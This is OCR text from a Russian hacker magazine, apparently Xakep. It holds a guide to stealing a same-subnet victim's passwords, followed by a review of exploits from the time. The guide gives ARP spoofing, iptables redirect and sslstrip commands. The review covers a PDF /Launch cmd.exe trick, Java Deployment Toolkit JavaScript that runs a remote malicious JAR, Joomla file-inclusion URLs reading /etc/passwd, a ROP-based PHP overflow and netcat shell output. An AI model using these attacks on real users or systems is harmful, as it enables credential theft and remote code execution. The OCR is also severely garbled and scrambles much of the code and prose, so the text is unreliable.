Выцепляем файлы ЫеІѵѵогкМіпег’ом 





ЗАДАЧА: УКРАСТЬ ЛОГИН И ПАРОЛЬ ОТ 
ОМАН И АНАЛОГИЧНЫХ СЕРВИСОВ, НА- 
ХОДЯСЬ В ОДНОЙ ПОДСЕТИ СЖЕРТВОЙ 



РЕШЕНИЕ: 

Для решения данной проблемы я напомнютебе способ, предложенный на Віаск 
На! йС 2009 с использованием ззізігір. 

Конечно, возможность приблизиться кжертве на расстояние «одной подсети» 
появляется нетакчасто, но, вто же время, взломавхотя бы однумашинуиз 
подсетки, мы получим доступ к данным всех остальных. 

Нам понадобится: 



1, ЗЗІзДгір ; 

2 . агрзрооД . 



есЬо "1" > /ргос/зуз/пеД/ірѵ4/ір_Гогтгс! 

Вобщем-то для того, чтобы украсть пароли из НТТР и РТР-соединений, к 
примеру, этого хватило бы. Запустив любой сниффер, мы просто вылавливаем 
необходимую нам инфу. 

Нохужедело обстоите протоколами, которые поддерживаютшифрованиетипа 
НТТРЗсего 551 и ИЗ. Какжетутбыть? 

Для НТТР5-протокола мы можем сделать что-то вроде поддельного НТТР/ 
НТТР5 прокси-сервера. То есть данные от жертвы будут отправляться 
не сразу на шлюз, а сначала на ззІзГгір, точнее, устанавливать с ним 
незащищенное НТТР-соединение, а сам ззізігір уже будетустанавливать 
защищенное соединение с Ѳтаіі и редиректить данные от жертвы. Для 
этого нам потребуется, во-первых, сделать редирект НТТР-трафика на 
наш «прокси». 



Я воспользовался ВаскТгаск’ом, где ПОужеустановлено. 
В примере: 



ірСаЫез -С паС -А РКЕКШТІШ -р Сер --сіезСіпаСіоп-рогС 80 
ЕЕБІЕЕСТ --Со-рогС 8080 



1) 192 ,168.0.1 - основной шлюз ; 

2) 192.168.0.101 — жертва; 

3) 192.168.0.102 -хакер. 

Итак, начнем: 

агрзрооС -і еШ) -С 192.168.0.101 192.168.0.1 

Перед отправкой каких-либо данных во внешнюю сеть жертва делает 
АРР-запрос, чтобы узнать МАС-адрес шлюза. Данной командой мы массово 
отправляем АРР-ответы нашей жертве отом, что шлюз реально находится по 
нашему, хакерскому, МАС-адресу. Таким образом, жертва думает, что 192.168.0.1 
расположен по МАС-адресу хакера, потому все пакеты отправляет нам, а не на 
шлюз. Вообще, возможность проведения спуфинга зависит оторганизации сети 
и настроек маршрутизации. 

Далее нам нужно, чтобы весьтрафикжертвы отнас перенаправлялся на реаль- 
ный шлюз, для этого пишем: 



Этой командой мы редиректим весьТСР-трафик, приходящий на 80 порт, на наш 
8080. 

Далее запускаем сервер ззізігір на (аргумент-1) 8080 порте и указываем, чтобы 
он вел логвеего трафика в файл ззізігір.іод (аргумент-а): 

ззІзСгір -а -1 8080 

Пароли и другую интересную информацию ищем в ззізігір.іод. 

Сам метод имеет ряд нюансов и о граничений, связанных с кэшированием 
данных браузером, кукисами, прямым выходом на НТТР5-соединение и 
т.д. Признаюсь, что во время тестирования стабильности в результатах 
ззізігі р я не добился, но все же смогукрасть пасс и отѲтаіГа, и отадминки 
к серверу. 

Ктомуже я проводил опыты на версии 0.2 (в поставке ВТ4], а последняя версия 
на время написания статьи — 0.7. В ней появилось много разных дополнитель- 
ных вкусностей, так что прикладываю именно 0.7. т 
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ОБЗОР ЭКСПЛОИТОВ 

Сегодня тебя ждет очередной разбор проверенных и наиболее опасных 
эксплойтов прошедшего месяца. Конечно, не все сплойты будут работать 
легко и просто. Иногда нужно понимать, что происходит в системе, как 
функционируют ее компоненты, как повлиять на систему через уязви- 
мость, чтобы заставить работать тот или иной эксплойт. В конечном счете, 
хакер - это не тот, кто знает, что, вставив кавычку в 6ЕТ-запрос, можно 
получить доступ к БД (условный пример), а тот, кто понимает, что эта ка- 
вычка значит, и как этот запрос в БД осуществляется. 



Ш Кольнул яюр 



АІ 



о Цех 0Овс О 0* Овіп ЙГрмцсы ОРіЦкнш СГрмы 
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0 ШШИШВ0 
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а утой стр*ні-ие требукт-ся дмюпмктвлл 




аѵа 6... 



♦.йот 



Меня взломали калькулятором через МѴА. Работает, зараза. 
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-Іоотіа. Радость червякам. 




ИСПОЛНЕНИЕ ПРОИЗВОЛЬНОГО КОДА 
ИЗРОР 



виз 

СѴЕ-20 10-1239 



ГАКѲЕТ5 



Рохіі Реабегдо версии 3.2.1 .0401 

ИМНЯ 

Господин Дидье Стивенс (ОібіегЗіеѵепз) опубликовал в своем блоге 
эксплойт, позволяющий запускать произвольные приложения в 
формате РОГ с помощью АсгоЬаІ Реабег и Рохб Реабег. При этом не 
используются никакие бреши в обработке формата. Фактически запуск 
произвольных приложений из РОР — возможность, определенная в 
спецификации формата. Интересно, что злоумышленники не заста- 
вили себя долго ждать и начали использовать эту «фичу» в своих ко- 
рыстных целях. Добавлю, что у пользователей АсгоЬаІ Реабег меньше 
шансов быть битыми, так как при запуске приложения выскакивает 
окошко с предупреждением (правда, злоумышленник может влиять на 
текст в этом окне, что позволяет использовать при атаке социальную 
инженерию]. 

МііШі 

Итак, что же позволяет нам выполнять произвольные приложения? 
Ответна этотвопрос можно найти в описании действия /І_аипсЬ. Чтобы 




54140» і№»-^«^Авп^Е«мхяЛѴі№)гі]' 

МлАккѵі гінкіі ■ 5ДО3132 І0М30 Лім А А япв.'еспіи*^»Й 1 3352 МяйкЬр] *«Ьг- Я У «г? 100*50 

«НН взаягліийк^ іЬіоійЗЭ Г55ЭМ5 1 1«Н 5Л іЬ*Ш2?Л<чввк 1^5 У2і 5 1 57РИИ ЛШ^ТикМнвЛш 

4 



боотіа. Мексиканская безопасность под угрозой. 



было понятно, рассмотрим формат РОР, который является не более чем 
текстовым файлом с описанием объектов, по сути выросшим из языка 
РозіЗсгірГ Таквот, каждый объектимеетсвойтип; насже интересует 
тип/Асбоп, в котором есть действие І_аипсЬ. Собственно, это действие и 
приводит кзапуску приложения. Рассмотрим эксплойт. 

8 0 оЬб 
« 

/Туре /АсСіоп 
/8 /ЬаипсЬ 
/Ѵ7і п 
« 
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№пЫу 

М^ПЧіЬпГйІ 

тае*пй 

Иыятпд (20) 
Мваяжгід (30) 
Мгляжгѵд (5е0) 
«Л*пеЛа 0«ку) 

НіЛл*І4 Тгця 0№СѴ) 

Веліпд 

ЗвйгсН 

ЗвсигІЬу 

5кшйу (ЕпИа*хжО 
5ре^ 







РОРИе^№кЙпе*і 



^ЕД^врегіІпдсІгдггЯУ^ 

йейоге йкгіі^ий ІЯ оГ -эйѵѵті лсчі Н« ЫІг^Нтег*. *т^р»; 



М&гтйі Асс»5 Ьт РОР Жм Оьй^Лг йте «вЬ Ьсй^іег 

іИеяезсрЬЛу репгЮегі, РОР Гіів сяшЬ мгаі гіотЛкк, № Йж Згідесиі, 
[ СЬапрв 5 б№дд„. | 



в Імй Ыцяѵ4 им сегіГмдеи ркчга ел ДДОк сетует (тч регятаі Мотаиоп Ь«п*) 



ЕдЛЬеГогеййЛч | муЬЦЦоиі] 




ношн 

«« • с х . 



Наконец-то мой шелл. 



іадкіі ^уктрументы утраіи’.а 

КІр://кхаІч»Ѵр«пРЬр6.рЬр?сЛ_5»348<роі_5-1246гг>(1«<»о#Е_в»15вр05_в-128 



Информационная без... ■" МеІаірісЛ Репеігойо... с! 5есцг*уРосц$ ІЙІ тАчОгтп > ехр Ы$ : ѵц... .ІИ ЕхрЫ.№1 С/) 5есиг*уІаЬ,г» 



(1) ТѵчЛ*е» / Ноте 



•,,. Загрузка... 



В ПРИСТУПЕ ПАРАНОЙИ ОТКЛЮЧАЕМ НЕ РРР-ПРИЛОЖЕ- 
НИЯ. 




Рі — помощь в получении шелла 



Командная строка - пса! ѵп 127.0.0.1 4444 




ЕВ С 


Р:\ЕХРЬОіг\НЙІ\ВІ8К\РНР6>псаС -ѵп 127.0.0.1 
МсаС Ѵвгвіоп 5.00 < ЬССр://ппар.огд/пса«: > 


4444 




Р : ЧЕХРЬОІ 2\НЙ 1 \ЙІ 8К\РНР6 >псаС -ѵп 127.0.0.1 
НсаС ѵегзіоп 5.00 < Ьсср://'ппар.оі*д/псаС > 


4444 




Р:\ЕХРЬОІ2\МЙІМ>І$К\РНР6>псаС -ѵп 127.0.0.1 
Нс«( ѵегзіоп 5.00 < Ь1Ср://ппар.огд/пса1 > 


4444 




Р:\ЕХРЬ0І2\Г1ЙІМ)І$К\РНР6>псаС -ѵп 127.0.0.1 
Исак ѵсгзіоп 5.00 < ІіИр://ппар.огд/псдІ > 


4444 




Р:\ЕХРЬ0І2\ИЙ|\ЭІ$К\РНР6>псаС -ѵп 127.0.0.1 
№а(: ѵсгзіоп 5.00 < Ьккр://птар.огд/пса*: > 
Соппесісс! Іо 127.0.0.1:4444. 

МісгозоЕС МіпсІомз ХР (Версия 5.1.2600) 

<С> Корпорация Майкрософт, 1985-2001. 


4444 




С : \иапр\Ып\арасЬе\Йрас Ье2 .2 . 1 1 > 








НЕДОСТАТОЧНАЯ ПРОВЕРКА ПАРА- 
МЕТРОВ В МѴАОЕРІ_ОѴМЕІМТТООІ_КІТ 



» 

епсІоЪд 

В первой строке мы создаем объект под номером 8 (номер порядковый], 
а далее открываем описание объекта и говорим, что это объекттипа 
Асбоп с действием баипсб. Тут/Р описываетимя запускаемого файла, а 
/Р — это текст, который будет отображен в окошке с предупреждением в 
АсгоЬаІ Веабег’е. Если мы хотим передать параметры для запускаемого 
исполняемого файла, то они также должны идти за спецификатором/Р, 
например: 

/Р (стсі.ехе) 

/Р (/0/С есЪо СехС>Рі1е) 

Ксожалению, параметры можно передавать только при использовании 
АсгоЬаі Веабег. 

Полноценный РРЕ-файл можно найти на диске. 



юштюы 



Рохіі выпустили патч, который добавляет окошко с предупреждением 
об открытии файла. В случае с АбоЬе, можно отключить выполнение не 
РБЕ-файлов в настройках в разделе Тгизі: Мападег. В общем, друзья, 
будьте внимательны... 



СѴЕ-20 1 0-1 423 

іГі1:адди 

баѵа 5Е 6 начиная с ирсіаіе 10 до ирсіаіе 20 

Еще одна логическая уязвимость. В этот раз недоглядели това- 
рищи из 5ип Огасіе. В результате мы имеем уязвимость, которая 
позволяете помощью специально сформированной НТМб-стра- 
ницы удаленно выполнять произвольные МР-файлы и даже 
подключать любые библиотеки 066. Фактически — выполнение 
произвольного кода. Особая опасность этой уязвимости кроется 
в независимости от браузера, и ее эксплуатация возможна даже в 
бі п и х (пока что только по слухам). Вот они — прелести кроссплат- 
форменности. Уязвимость содержится в баѵа Оеріоутепі: Тооікб, 
которая используется для развертывания баѵа-приложений через 
ѴѴеЬ. 

ЬШЫіі 

Баг-хантер, нашедший уязвимость — Тэвис Орманди (Таѵіз Огтапбу] — 
опубликовал и эксплойт. Данный эксплойт открывает бАП-файл, который 
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Р0Р ЕЗІ 


6РР24ѲЕ0 


50 


РОР Е8Р 


6РР240Е1 


5В 


РОР ЕЁХ 


6РР240Е2 


СЗ 


РЕТГі 


6РР24ѲЕ8 


90 


НОР 


6РР240Е4 


90 


НОР 
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6ЕЕ65005 
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59 

СЗ 

9Ѳ 



РОР ЕСХ 
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НОР 



0 
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6ЕЕ0222В 
I 6ЕЕ02220 
6ЕЕ0222Е 
6ЕЕ0222Р 
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Ѳ064 І8С0 
00641000 
Ѳ064ШЕѲ 
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8Ѳ64 11ѲѲ 
Ѳ06411І0 
80641120 
00641130 
8Ѳ641140 
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03С1 

5В 

50 

СЗ 



ЙОО ЕЙХ, ЕСХ 
РОР ЕВХ 
РОР ЕВР 
РЕТН 



1 0 ЗВ 
80 ѲѲ 
74 09 
00 8В 
54 ЗЙ 
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30 52 
іиі 



43 03 51 
33 С4 18 
50 ЕЗ ЙЗ 
86 ЗБ СѲ 
РС 66 ЗВ 
Й1 08 18 



0Е 00 

ев ос 
РС зв 



6Й 01 5Ѳ 
ЗВ 44 91 
33 С4 20 
Пй 4Р 
48 84 85 
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33 СЗ 
57 32 
74 4Е 
4Й 23 
ЗЕ.Л 1 



ЕЗ 06 
РС ЗВ 
5Р 5Е 

" 56 

С9 74 



2&Ш 

РР 5Р 5Е 
00 83 04 
8В 13 8В 
51 6Й 00 
8 В 4С 82 
ОР 0Е 00 
0Е 83 СО 
33 00 5В 
8В' 74 24 
45 66 ЗВ 




00 6Й 
5В СЗ 
04 С7 
00 ЛІІ 
50 ЕЗ 
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ЗВ 0В 
2Й 50 
03 98 
ѲЗ 8В 
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ЕОХ 00000 1Й0 
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Е5І 42424242 
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I ІЬаргіс*6ЕЕ52658 



С Ѳ 
Р 1 



ЕЗ 0023 32ЬІ* 0«РРРРРРРР> 
СЗ 001В 32 Ъі* ѲС РРРРРРРР) 



02РЗРВ28 

Ѳ2РЗРВ2С 

02РЗРВ30 

02Р8РВ34 

82РЗРВЗЗ 

02Р8РВЗС 

Ѳ2РЗРВ4Ѳ 

02Р8РВ44 

02РЗРВ48 

02РЗРВ4С 

Ѳ2Р8РБ50 

Ѳ2Р8РВ54 

Ѳ2Р8РВБЗ 

02РЗРВ5С 

02РЗРВ6Ѳ 

82РЗРВ64 

82Р8РВ68 

Ѳ2Р8РВ6С 

Ѳ2Р8РВ7Ѳ 

02РЗРВ74 

02Р8РВ73 

Ѳ2Р8РВ7С 

Ѳ2Р8РВ80 

8ШШ 



6РР240ОО 
42424242 
42424242 
42424242 
6Е265004 
РРРРРОВС 
6ЕЕ0222В 
6ЕЕ52650 
6ЕЕ52650 
6ЕЕ61С13 
6ЕЕ6Е94Е 
42424242 
6ЕЕ65004 
РРРРРР5С 
6ЕЕ6Е94С 
42424242 
6ЕЕ7ѲС54 
42424242 
6ЕЕ6364Ѳ 
42424242 
6ЕЕ629Р1 
42424242 
6ЕЕ629Р 1 



ИЫтргі,6РР240ОО л 

ВЕТІІВН *д ЦЬаргие.6ЕЕ650О4 

[ ІЬарг^І . 6ЕЕ0222В 
1 і Ьэрг і с. 6ЕЕ52658 
иЬаргІс-6ЕЕ52658 
I ІЪарг-и г • 6ЕЕ6 1 С 1 3 
1 іЪаргиб . 6ЕЕ6Е94Е 

РЕ ТІІВН $ д I і Ьарги е . 6ЕЕ65004 

ЦЪарги*.6ЕЕбЁ94С 

I ІЬзргиб * 6ЕЕ70С54 

1 іЬаргиЪ . 6ЕЕ6о648 

ІіЬарги* ,6ЕЕ629Р1 

1 1 Ъарг и % т 6Е Е629Р 1 ѵ 



ВОР во всей красе. 



открывает калькулятор. Сплойтзаточен для использования в браузерах 
РігеРох и Іпіегпеі Ехріогег. Для лисы код такой: 

/*Ьббр : / /Іоск . сшрхс!ід8Ь . сош/саіс . ]аг - злой БАК* / 
ѵаг и = " Ъббр : -Б- з аг -Б\ \ \ \ Іоск . стрхсЬд8Ъ . сош\ \ саіс . з аг попе " ; 

/ *МІМЕ тип может быть разным, так что создадим два объ- 
екта*/ 

ѵаг о = босшпепб . сгеабеЕІетепб ( " ОВБЕСТ" ) ; 
ѵаг п = босшпепб .сгеабеЕІетепб ( "ОВБЕСТ" ) ; 

о. буре = " аррІісабіоп/пргипбіте-зсгірбаЫе- 
ріидіп; беріоутепббооікіб " ; 

п. буре = " арріісабіоп/з аѵа-беріоутепб-бооікіб " ; 
боситепб . бобу . аррепбСМІб (о) ; 

боситепб . Ьобу . аррепбСЬіІб (п) ; 

/*Пробуем запустить объект сначала для старого типа, 
если не вышло — то для нового*/ 
бгу { 

// 016 буре 

о . ІаипсЬ. (и) ; 

} сабсЬ (е) { 

// Бем буре 

п . ІаипсЬ. (и) ; 

} 

А для ІЕ — такой: 

/*Ьббр : / / Іоск . стрхсЬд8Ъ . сош/саіс . з аг — злой БАК* / 

ѵаг и = "Ьббр: - Б~з аг - Б\ \ \ \1оск . стрхсЬд8Ъ . сот\ \са1с . з аг 

попе " ; 

/*Создаем объект, используя его классовый ІБ*/ 
ѵаг о = босшпепб . сгеабеЕІешепб ( " ОВБЕСТ" ) ; 
о . сіаззіб = " с 1 з і 6 : С АЕЕ ЕЕ АС - БЕС 7-0000-0000- 
АВСБЕЕЕЕБСВА " ; 



/*Начинаем атаку...*/ 
о . ІаипсЬ (и) ; 

Как видно, весь секрет в формате параметра для метода ІаипсЬ. Фак- 
тически этот метод за пускает] а ѵаѵѵз.ехе суказанными параметрами. 
Параметр 3-\аг говорит, что будем запускать ЗАВ. Вот и весь секрет. 
Независимо отТэвиса эту же уязвимость обнаружил Рубен Сантамарта 
(РиЬеп Запіатаііа). Крометого, Рубен предложил способ загрузки 0І_І_, 
а не ЗАВ. Для этого предлагается использовать не 3-]аг параметр, а 
З-ХХаІДѵіті. Этот параметр говорит]аѵа\л/5.ехе, что мы не будем использо- 
вать стандартную виртуальную машину, и что у нас есть своя виртуальная 
машина, гораздо лучше. Второй вариант эксплуатации взят прямо из 
кода, написанного 511 N1: 

іб (Ьгоѵ^зег == ' М8ІЕ ' ) 

{ 

босшпепб .шгібе ( ' < ' + 

' оЬзесб с1аззі6=" сізіб: 8АБ9С840-044Е-11Б1-ВЗЕ9- 
00805Е499Б93 " 1 + ' ѵ7ІсібЬ= " 0 " ЬеідЬб= " 0 " > ' + '<’ + 

' РАКАМ пате =" ІаипсЬзпІр" ѵа1ие=" 1 + 

3 пір + ' " ' + 

' >' + 1 <» + 1 РАКАМ пате=" босЬазе" ѵа1ие=" 1 + 
з'пІрБосЬазе + ' " 1 + '>' + '<' + '/' + 'оЬзесб' + 

' > ' ) ; 

} 

еізе іб (Ъгочлзег == 'Бебзсаре Еатііу') 

{ 

боситепб .ѵѵгібе ( ' < ' + 

' етЪеб буре= " арріісабіоп/х-з аѵа-арріеб ; зрі- 
ѵегзіоп=' + 

берІоуБаѵа . бігебохБаѵаѴегзіоп + 1 " 1 + 

' Ѵ7ІСІ6Ь="0" ЬеідЬб= " 0 " ' + 

1 1аипсЬзп1р= " 1 + зпір + 1 " ' + 
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І№ тсжан мйі І.кѴритЗукгчСаІ ІЛ« 

I 

■ і ’ 

Рю 


СО 4? Ч № Ей щ Г 45 М 'СГ.рСР. 

й? И № 2* Ей «і .РЕ. ЕЕ. 

чв м «-а ее ее е® 4і ее вер . ■ рт. 

«№Жа Кі Н 9) ІЧ Р «а ІВ ОРР.іРР. 

«нечем аа те +а ее се =а *а к> ■ рр. і рг. 

кнг-ірм еп те 4 * ее ее 5 1 те г** . . се. 

йЙ4~405о Ай «1 44 М Сй Е1 Ы М. ЧЛ\ 

ее+ечме оа 52 те ее ее аа ао м .№ 

дозд» аа ей м ее ге тв 45 ее .... і се. 

«4®4М4 № т® *5 Ѳв РС *5 М МЕ.и-Е. 

«ч&іем га ее те о? ее 45 ее Е4 Е...»е, 

«нечета, та те чі ее ее аа ае ее ■нзе . . . . , 

тми те ее » те те , «е, 

ПП4Т4ИТО И 1*1 ад » » «МН ОІ1 

аа аа ■» ее ее аа ао ее 1“ ! С 1 1 
«мечойо те аа 23 2п та- і* ?и и ет^а 

аач&юр® % и э а? н іо а п аа а -а 

«««» Е2 45 < 5? й 1$ аз и НЕІ.М -й 

еечечеее бт « ч ж зг га и а* усик -о 

«емечесе 35 в * га за н н іи -и 


ЁГТ45АЙ 40 Г 4 

«в:-т*те заняв пѳе 

Ейтегче? малао-іи г*? 

йомене* аомеом Ееее 
астерчее мае»» ич>р 

г; 







117:25:51 1 Ассые ѵиЫню *Лиі тхйід рИІВРИИІ ■ ии Во [ѵт вжсрОжі р-о^ил 



Атутуже едд-НипІег не найден. Что за дела? 

' с!осЪазе= " 1 + з'пІрБосЪазе + 

' />' ) ; 



нию локальных файлов и выполнению произвольного кода. Я выделил 
шесть плагинов стаким багом. Некоторые из них достаточно популярны, 
а уязвимые сайты легко идентифицируются с помощью Ооодіе. 

ТШБр : // [ЗІТЕ] /іп<іех.р]тр?орЦіоп=сот_зеЪегсагЦ&ѵіетлг= . . / . 

. /еСс/раззмс1%00 

ЪДДр: // [ЗІТЕ] /іп<іех.р1ір?орЦіоп=сот_роѵ^егтаі1&сопЦго11е 
г= . /екс/раззѵ7СІ%00 

іШБр: // [ЗІТЕ] /іпсіех . р]тр?орЕіоп=сот_пеѵ^з_рогЦа1&сопЕго 
11ег= /екс/раззж1%00 
іШБр: // [ЗІТЕ] /іп<іех.р]тр?оркіоп=сот_аѵ7Ікі&сопкго11ег 

. /екс/ 

раз зѵід.% О О 

Ыскр: // [ЗІТЕ] /іп<іех.р}ір?орЦіоп=сот_зикеЬох&сопЦго11ег= 

. /екс/раззж1%00 

іШкр: // [ЗІТЕ] /іп<іех.р]тр?оркіоп=сот_<іакаІее<із&сопкго11е 
г=. /екс/раззж1%00 



} 

Как видно из этой подборки, уязвимость кроется в переменной сопітоііег. 

Внедрять команды аналогичным образом можно с помощью перемен- Авсе потому, что разработчикнеучелтого, как фильтруется переменная 
ных босбазе и 1аипсН]п1р. при получении ее через ЭРедиезІщдеіѴагО. Уязвимый код: 



50ШТІ0Ы 



Тэвис сообщил обуязвимости компании Огасіе, нотам сказали, что баг 
не критичен, и патч может подождать ежеквартального обновления. 
Однако, когда эту уязвимость начали использовать злоумышленники, 
причем, по словам Тэвиса, еще до того, какой опубликовал информацию, 
Огасіе изменили свое мнение и выпустили патч, который просто убирает 
кусок кода, запускающий ]аѵа\л/з.ехе. 

ЛОКАЛЬНЫЙ ИНКЛУД ФАЙЛОВ В КОМ- 
ПОНЕНТАХ ЛЗОМІ. А 



ГАВ6ЕТ5 



• сош_пеѵ^з_рогка1 ѵегзіоп 1.5.x 

• сот_аѵ7Ікі 

• сош_зеЬегсагк ѵегзіоп 1.0.0.12 

• сот_дооѵ7егтаі1 ѵегзіоп 1.5.3 

• сош_зикеЬох ѵегзіоп 1 . 7 

• сош_сіаЦа1еесіз ѵегзіоп 880 

Уязвимости в ѴѴеЬ-скриптах — явление настолько частое и обыденное, 
что удивить кого-то очередным багом в плагинах для Зоотіа врядли 
удастся. Но в последнее время на сайтеехрІоіІ-бЬ.сот в разделе ѴѴеЬ- 
эксплойтов только и присутствуютзаписи про плагины кэтому популяр- 
номудвижку. Кто-то серьезно взялся за Зоотіа. Эти кто-то — в основном 
ребята из АпІіЭесигіІу, ОеѵіІЕТМ и «частные»лицатипа Ѵаіепііп’а. 

За деньтолько АпІіЭесигіІу присылали оттрех до десяти эксплойтов 
для разных плагинов. Этакий распределенный аудит безопасности 
плагинов для Зоотіа. В результате мы имеем базууязвимых плагинов, 
что крайне удобно. Кроме того, гугль скрипт киддисы также получат море 
удовольствия (которое нами, естественно, не одобряется]. Так или иначе, 
количество сайтов суязвимыми плагинами на Зоотіа переваливаетза 
тысячи. Если кто напишетчервячка, заражающего Зоотіа движки, будет 
неприятно. Лично мой 055ІМ уже надоел спамом отсканов на старые 
дыры в РбрМуАбтіп и ВоипбСиЬе ѴѴеЬтаіІ. 

МііЫѴі 

По понятным причинам, все уязвимости ятутописывать не буду, таккак 
они однотипны. Коснемся лишь ЕРІ-уязвимости, которая приводиткчте- 



// Кедиіге зресіііс сопСгоІІег іі гедиезкесі 

ІС ( $сопкго11ег = БКедиезБ : : деБѴаг ( 1 сопБгоІІег 1 ) ) { 

гедиіге_опсе ( БРАТН_СОМР(ЖЕБТ . БЗ . 1 сопБгоІІегз 1 . 
БЗ . $сопкго11ег . 1 . ркр 1 ) ; 

} 

Ошибка в гедиіге_опсе, которая подключает необработанную пе- 
ременную фсопігоііег. Напоминаю разработчикам — функция 
ЗРедие5І::деіѴаг() фильтрует толь ко НТМЕ-инъекцию. 



юштюы 



Если разработчик плагина неудосужился выпуститьобновление.то 
либо меняй плагин, либо вручную добавь фильтрацию символов из 
набора 

ПЕРЕПОЛНЕНИЕ БУФЕРА В5ТК_ 
ТКАМЗЫТЕКАТЕО 

ЦЩЙЗЁ 

РНРб.ООеѵ 

ЯЗа 

Переполнение буфера было обнаружено в одной из функций РНР 6.0. 

При передаче строки большой длины мы перезаписываем данные в 
стеке, включая адрес возврата. Очень мило. Эксплойт был опубликован 
гражданином под псевдонимом РгОТЗсТЮп. Реальность атаки, конечно, 
очень мала, так как нам надо, чтобы жертва по каким-то необъяснимым 
причинам использовала версию РНР 6.0 Оеѵ. Кроме того, в РНР-коде 
скриптов должна использоваться уязвимая функция зіМтапзІіІегаІеО, 
в которую передается параметр из ОЕТ/РОЭТ-запроса. Аеще в рбр. 
іпі должна быть настройка, позволяющая работать с ипісобе строками. 
Короче, в реальной жизни реализация такого эксплойта маловероятна. 
Тем не менее, через неделю выходит другая версия эксплойта, которая 
обходит ЭЕР и АВИР. Это, с чисто академической точки зрения, уже 
намного интереснее. Вот этот эксплойт, разработанный Маттио Мемелли 
(МаИео МетеШ] мы и рассмотрим. 

МііЫѴі 

Эксплойт представляет собой обычный РНР-файл, в котором уже 
забит шелл-код, адреса возврата и т.д. На вход скрипт принимает 4 
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СРІІ - 


іНгеасі 00000Р60 


009ВР48С 


42 


ІМС ЕВХ 


А 


1 009ВР48В 


52 


РІІ5Н ЕВХ 


С 


1 ѲѲ9ВР43Е 


6Й 02 


РІІЗН 2 




009ВР490 


58 


РОР ЕЙХ 




1 0Ѳ9ВР491 


СВ 2Е 


ІМТ 2Е 




1 009ВР493 


ЗС 05 


СИР Й|_, 5 




1 009ВР495 


5й 


РОР ЕВХ 




1 Ѳ09ВР496 


л 74 ЕР 


ЗНОРТ 009ВР487 




1 Ѳ09ВР493 


В8 54303057 


МОО ЕЙХ, 57303054 




Ѳ09ВР49В 


ЗВРЙ 


ИОВ ЕВЬЕВХ 




009ВР49Р 


ЙР 


ЗСЙ8 ВОЮРВ РТР ЕЗ:СЕ0П 




1 Ѳ09ВР4Й0 


л 75 ЕЙ 


ЗНОРТ 009ВР48С 




009ВР4Й2 


ЙР 


ЗСНЗ ВУОРВ РТР Е8:СЕ0П 




009ВР4ЙЗ 


л 75 Е7 


Ж ЗНОРТ 009ВР48С 




Ѳ09ВР4Й5 


РРЕ7 


ЭИ ЕВІ 




009ВР4Й7 


98 


МОР 




009ВР4Й8 


90 


МОР 




009ВР4Й9 


90 


МОР 




Ѳ09ВР4ЙЙ 


90 


МОР 




0Ѳ9ВР4ЙВ 


9Ѳ 


МОР 




1 Ѳ09ВР4ЙС 


90 


МОР 




Ѳ09ВР4ЙО 


98 


МОР 




009ВР4ЙЕ 


90 


МОР 




009ВР4ЙР 


90 


МОР 


V 




_9Й 


МОЕ 




I ЕЙХ=57303054 




| ЕЗ: СЕПП: 


С 7С90Р00Е ] -5 1 390С52 



Найдем шелл-код, подправим адрес возврата. 



разряда адреса (ниже поясню, какой функции]. В конце файла — блок 
в виде Ьазе64. При раскодировании этот блок представляет собой 
отдельный скрипт на питоне, которые формирует ВЕТ-запросы для 
РНР-скрипта. Эксплойт должен обходить РЕР и АЗИН. Тут на помощь 
приходят разработчики софта. Оказывается, не все библиотеки 
скомпилированы с поддержкой АЗИВ, а это значит, что, даже если ОС 
поддерживает эту технологию, базовый адрес библиотеки все равно 
будет статичным. Этим -то и воспользовался автор эксплойта, успешно 
применив технику возвратно-ориентирова иного программирования 
(ВОР). В прошлом обзоре я уже кратко рассказывал про этутехнику. 
Суть ее сводится ктому, что мы перезаписываем в стеке адрес воз- 
врата на нужные нам инструкции, после которых идет инструкция ВЕТ. 
Процессор исполнит эти команды, дойдет до ВЕТ и возьмет из стека 
(контролируемого нами] следующий адрес, по которому опять будут 
исполнены необходимые инструкции, а после — опять ВЕТ. Таким 
образом, эксплойт вычисляетабсолютный адрес шелл-кода. 

Таким образом мы обошли АЗЕВ и О ЕР, нотаки не передали управление 
шелл-коду, а только вычислили его адрес. Для этого нам осталось вы- 
звать функцию копирования шелл-кода в исполняемую область памяти. 
Последний писк моды — использовать функцию ѴѴгЕеРгосеззМетогу, 
которая может копировать шелл-код, например, прямо в Тех* секцию 
потока. То есть, в исполняемую память. Собственно адрес шелл-кода 
эксплойт вычислил с помощью ВОР, адрес исполняемого потока тоже 
известен (Тех* секция библиотеки без поддержки АЗЕВ]. Можно вызы- 
вать ѴѴгЕеРгосеззМетогу. 

Но не тут-то было. Дело в том, что функция эта лежит в библиотеке 
кегпе132.сШ, а о на -то как раз точно поддерживает АЗЕВ. Таким 
образом, мы не знаем адреса нужной нам функции. Тут нам и по- 
надобится скрипт на питоне. Дело в том, что эксплойт, как я писал 
выше, принимает параметры: разряды адреса, адреса функции 
ѴѴгЕеРгосеззМетогу. Если этот адрес неверен, то Арасбе просто 
упадет. Но... есть одно «но» — упадет лишь созданный процесс 
апача, ведь известно, что апач создает процессы на обработку 



соединений, и пользователь работает не с родительским (основным] 
процессом, ас дочерним. В итоге, если он упадет, то ничего страш- 
но го. Основной процесс породит нам еще сколько надо дочерних, 
роняй — не хочу. Так как АЗ ИВ меняет только два байта старших раз- 
рядов адреса, то можно банально перебрать их, пока не наткнемся 
на адрес искомой функции и не получим шелл-код. Это, конечно, 
долго, но работает. Младшие два байта статичны и зависят лишь от 
версии ОС. Например, на моей ѴѴіпсІоѵѵз ХР эксплойт не заработал, 
пришлось искать адрес функции. Так как ХР не поддерживает АЗЕВ 
вообще, то можно запустить эксплойт и без брутфорса: 



ЫсСр: // [ 8ІТЕ] /рѵтпРЬрб . р!ір?о:Е:Е:_з = 34&роз. 
з = 1 2 4 &гпс!= 0 &о і: :Е_е= 1 5 &ро з_е= 1 2 8 



В параметрах байты разрядов адреса функции ѴѴгЕеРгосеззМетогу. 
Сам эксплойтищи на 0Ѵ0. 



ІОШЛОМ 



Защититься оттакой проблемы легко: 

1 . Не использовать уязвимую функцию; 

2. Не использовать РНР 6.0 Оеѵ; 

3. Проверять дли ну вводимых параметров; 

4. Не использовать ІЭпісосІе. 




ПЕРЕПОЛНЕНИЕ БУФЕРА ПРИ ИНИЦИ- 
АЛИЗАЦИИ СЕССИИ В 5АР МАХОВ 
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И вновь шелл, теперьуже справами 5Ѵ5ТЕМ. 



Удаленное переполнение буфера в БД 5АР МахБВ интересно 
тем, что для эксплуатации не нужно аутентифицироваться в БД, 
